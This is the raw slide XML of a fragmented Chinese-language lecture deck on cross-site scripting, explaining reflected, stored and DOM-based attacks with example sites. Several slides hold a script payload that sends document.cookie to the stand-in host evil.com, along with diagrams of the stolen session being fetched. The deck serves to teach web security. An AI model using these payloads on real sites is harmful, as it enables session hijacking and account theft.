            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18019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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击方式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反射型攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将恶意代码作为链接的组成部分注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码在页面打开时会被渲染执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>存储型攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者提交恶意脚本到服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器保存恶意脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>受害者访问含有恶意代码的页面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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的攻击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58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反射型攻击示例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以搜索引擎为例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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http://www.websearch.com/search?q=Christo+Wilson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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B0B18F6-4A2D-41A9-8246-3F7C61A5D2CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1134481" y="3120888"/>
            <a:ext cx="7207120" cy="2213687"/>
            <a:chOff x="1273629" y="3806793"/>
            <a:chExt cx="7207120" cy="2213687"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1273629" y="3806793"/>
              <a:ext cx="7207120" cy="22136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78682" y="3816900"/>
              <a:ext cx="7197013" cy="520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50" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>W</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>e</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>S</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>e</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>h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65665" y="3915454"/>
              <a:ext cx="2759528" cy="323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25193" y="3915454"/>
              <a:ext cx="353786" cy="323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9874" y="4608895"/>
              <a:ext cx="2838149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/>
                <a:t>Results for: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" b="1" dirty="0"/>
                <a:t>Christo Wilson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89873" y="5148101"/>
              <a:ext cx="4107728" cy="617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>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Christo Wilson – Professor at Northeastern</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1463" dirty="0"/>
                <a:t>http://www.ccs.neu.edu/home/cbw/index.html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292839" y="2355574"/>
            <a:ext cx="2153039" cy="4174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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2415861" y="3879394"/>
            <a:ext cx="1735907" cy="462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5021CC-EB23-4E59-8CB7-69E77AFA14F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990601" y="5775970"/>
            <a:ext cx="6831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如果输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>&lt;img src=“http://img.com/nyan.jpg”/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102434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如果未做过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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364" y="2063297"/>
            <a:ext cx="8420100" cy="54891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http://www.websearch.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img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=“http://img.com/nyan.jpg”/&gt;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E6BE138-63AF-42BD-927F-D1C5DB57979D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1144420" y="2987482"/>
            <a:ext cx="7207120" cy="2213687"/>
            <a:chOff x="1144420" y="2987482"/>
            <a:chExt cx="7207120" cy="2213687"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1144420" y="2987482"/>
              <a:ext cx="7207120" cy="22136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49473" y="2997589"/>
              <a:ext cx="7197013" cy="520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50" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>W</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>e</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>S</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>e</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>h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36456" y="3096143"/>
              <a:ext cx="2759528" cy="323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5984" y="3096143"/>
              <a:ext cx="353786" cy="323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0665" y="3789584"/>
              <a:ext cx="123219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/>
                <a:t>Results for:</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1950" b="1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30" b="11799"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2547215" y="3768972"/>
              <a:ext cx="1702594" cy="1329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2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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反射攻击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619" y="2037234"/>
            <a:ext cx="8536344" cy="7928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http://www.websearch.com/search?q=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.write(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'&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src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="http://evil.com/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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+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'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>);&lt;/script&gt;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58" y="4421153"/>
            <a:ext cx="816747" cy="816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58303" y="5338555"/>
            <a:ext cx="2848857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Origin: www.websearch.com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session=xI4f-Qs02fd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3039" y="5661368"/>
            <a:ext cx="94448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evil.com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22" y="3156863"/>
            <a:ext cx="725925" cy="725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22" y="4924247"/>
            <a:ext cx="725925" cy="725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83586" y="3920661"/>
            <a:ext cx="164339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websearch.com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25" y="4761858"/>
            <a:ext cx="521529" cy="5215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2" y="3142529"/>
            <a:ext cx="1011714" cy="101171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3161612" y="4851418"/>
            <a:ext cx="3868616" cy="431966"/>
            <a:chOff x="3891215" y="5179671"/>
            <a:chExt cx="4761373" cy="53165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891215" y="5505062"/>
              <a:ext cx="4761373" cy="2062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5159">
              <a:off x="5136825" y="5179671"/>
              <a:ext cx="2561254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4) GET /?session=…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89556" y="3123392"/>
            <a:ext cx="2209764" cy="1297761"/>
            <a:chOff x="1710222" y="3052867"/>
            <a:chExt cx="2719709" cy="1597244"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Curved Connector 18"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="18" idx="3"/>
              <a:endCxn id="11" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1710222" y="3699014"/>
              <a:ext cx="1714678" cy="951097"/>
            </a:xfrm>
            <a:prstGeom prst="curved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122599" y="3052867"/>
              <a:ext cx="2307332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1) </a:t>
              </a:r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发送恶意链接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102624" y="3494556"/>
            <a:ext cx="3720386" cy="961023"/>
            <a:chOff x="3818615" y="3509684"/>
            <a:chExt cx="4578936" cy="1182798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3818615" y="3509684"/>
              <a:ext cx="4578936" cy="118279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724147">
              <a:off x="4222307" y="3726643"/>
              <a:ext cx="3415531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2) GET </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1625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search?q</a:t>
              </a:r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=&lt;script&gt;…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91105" y="3882788"/>
            <a:ext cx="3647068" cy="946739"/>
            <a:chOff x="3927513" y="3987508"/>
            <a:chExt cx="4488699" cy="1165217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3927513" y="3987508"/>
              <a:ext cx="4488699" cy="11652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0724147">
              <a:off x="4736343" y="4205092"/>
              <a:ext cx="2644117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3) HTTP/1.1 200 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22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存储型攻击示例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假设某社交网站：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>.friendly.com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B9496DF-06BA-4813-8FC8-FC20F2E8B98E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1114603" y="2387859"/>
            <a:ext cx="7207120" cy="3022341"/>
            <a:chOff x="1273629" y="2998139"/>
            <a:chExt cx="7207120" cy="3022341"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1273629" y="2998139"/>
              <a:ext cx="7207120" cy="30223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902030302020204" pitchFamily="66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83736" y="3008247"/>
              <a:ext cx="7197013" cy="52057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5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   friendly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3285" y="3106802"/>
              <a:ext cx="2759528" cy="323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3796" y="3708237"/>
              <a:ext cx="1813317" cy="342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b="1" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>What’s going on?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79391" y="4033326"/>
              <a:ext cx="5170326" cy="12391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I hope you like pop-tarts ;)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1463" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1463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&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>document.body.style.backgroundImage</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463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 = "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463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(' http://img.com/nyan.jpg ')"&lt;/script&gt; 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10385" y="5368504"/>
              <a:ext cx="1339332" cy="36389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mic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Update Status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605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好友浏览状态时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>…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0E38C84-C556-4409-AB41-BEBB6D986A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1114603" y="2024104"/>
            <a:ext cx="7207120" cy="3022341"/>
            <a:chOff x="1273629" y="2998139"/>
            <a:chExt cx="7207120" cy="3022341"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1273629" y="2998139"/>
              <a:ext cx="7207120" cy="30223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902030302020204" pitchFamily="66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30" b="11799"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1273629" y="3528817"/>
              <a:ext cx="7207120" cy="249166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283736" y="3008247"/>
              <a:ext cx="7197013" cy="52057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950" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>   friendly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3285" y="3106802"/>
              <a:ext cx="2759528" cy="323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23797" y="3708237"/>
              <a:ext cx="2408032" cy="342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25" b="1" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Latest Status Updates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70718" y="4122490"/>
              <a:ext cx="4523404" cy="6027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I hope you like pop-tarts ;)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1463" i="1" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Monday, March 23, 2015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796" y="4122490"/>
              <a:ext cx="602700" cy="60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622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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>存储攻击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801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&lt;script&gt;</a:t>
            </a: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'&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src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="http://evil.com/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>);&lt;/script&gt;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50" y="4493726"/>
            <a:ext cx="816747" cy="816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4648" y="5422122"/>
            <a:ext cx="2685352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Origin: www.friendly.com</a:t>
            </a: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session=xI4f-Qs02fd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3039" y="5661368"/>
            <a:ext cx="94448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evil.com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22" y="3156863"/>
            <a:ext cx="725925" cy="725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22" y="4924247"/>
            <a:ext cx="725925" cy="725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87780" y="3920661"/>
            <a:ext cx="143500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friendly.com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25" y="4761858"/>
            <a:ext cx="521529" cy="5215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" y="3519825"/>
            <a:ext cx="1011714" cy="1011714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4312499" y="4896127"/>
            <a:ext cx="2717729" cy="387256"/>
            <a:chOff x="5307691" y="5234699"/>
            <a:chExt cx="3344897" cy="47662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5307691" y="5557252"/>
              <a:ext cx="3344897" cy="15407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65159">
              <a:off x="5859318" y="5234699"/>
              <a:ext cx="2241639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  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>5) GET /?session=…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12499" y="3599100"/>
            <a:ext cx="2717729" cy="894627"/>
            <a:chOff x="5307691" y="3638353"/>
            <a:chExt cx="3344897" cy="1101079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307691" y="3638353"/>
              <a:ext cx="3344897" cy="11010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496064">
              <a:off x="5342946" y="3810252"/>
              <a:ext cx="3087811" cy="378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  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>3) GET /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400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profile.php?uid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>=…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5608" y="3874068"/>
            <a:ext cx="2554620" cy="849007"/>
            <a:chOff x="5508441" y="3976776"/>
            <a:chExt cx="3144148" cy="1044932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508441" y="3976776"/>
              <a:ext cx="3144148" cy="10449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0488569">
              <a:off x="6135229" y="4442476"/>
              <a:ext cx="2298854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  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>4) HTTP/1.1 200 OK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24018" y="4180369"/>
            <a:ext cx="2734062" cy="721731"/>
            <a:chOff x="1260330" y="4353762"/>
            <a:chExt cx="3364999" cy="888284"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260330" y="4564443"/>
              <a:ext cx="3107608" cy="6776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772489">
              <a:off x="1527615" y="4353762"/>
              <a:ext cx="3097714" cy="42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2</a:t>
              </a:r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) </a:t>
              </a:r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发送链接给攻击目标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01790" y="3005453"/>
            <a:ext cx="5948654" cy="912529"/>
            <a:chOff x="1356049" y="2907711"/>
            <a:chExt cx="7321420" cy="1123113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1356049" y="2907711"/>
              <a:ext cx="7321420" cy="1123113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7321420"/>
                <a:gd name="connsiteY0" fmla="*/ 1123113 h 1123113"/>
                <a:gd name="connsiteX1" fmla="*/ 1150775 w 7321420"/>
                <a:gd name="connsiteY1" fmla="*/ 258477 h 1123113"/>
                <a:gd name="connsiteX2" fmla="*/ 5200261 w 7321420"/>
                <a:gd name="connsiteY2" fmla="*/ 3440 h 1123113"/>
                <a:gd name="connsiteX3" fmla="*/ 7321420 w 7321420"/>
                <a:gd name="connsiteY3" fmla="*/ 395326 h 112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1420" h="1123113">
                  <a:moveTo>
                    <a:pt x="0" y="1123113"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142032" y="784101"/>
                    <a:pt x="284065" y="445089"/>
                    <a:pt x="1150775" y="258477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2017485" y="71865"/>
                    <a:pt x="4171820" y="-19368"/>
                    <a:pt x="5200261" y="3440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6228702" y="26248"/>
                    <a:pt x="6775061" y="210787"/>
                    <a:pt x="7321420" y="395326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1434316">
              <a:off x="3324046" y="3014895"/>
              <a:ext cx="3388688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1</a:t>
              </a:r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) Post</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" alt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恶意</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1625">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1625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/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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74974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/>
              <a:t>选择语言：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&lt;select&gt;&lt;script&gt;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“&lt;OPTION value=1&gt;”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.location.href.substring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.location.href.indexOf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"default="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) + 8)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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“&lt;/OPTION&gt;”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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>.write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"&lt;OPTION value=2&gt;English&lt;/OPTION&gt;"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&lt;/script&gt;&lt;/select&gt;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zh-CN" altLang="en-US" sz="1800"/>
              <a:t>一般用法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="180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://site.com/page.html?default=French</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>恶意用法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="180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://site.com/page.html?default=&lt;script&gt;alert(document.cookie)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472609" y="1417638"/>
            <a:ext cx="3167252" cy="565327"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -47003"/>
              <a:gd name="adj2" fmla="val 167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document.location.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="160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href</a:t>
            </a:r>
            <a:r>
              <a:rPr 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是地址栏演示的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="160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URL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57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应对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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客户端措施</a:t>
            </a:r>
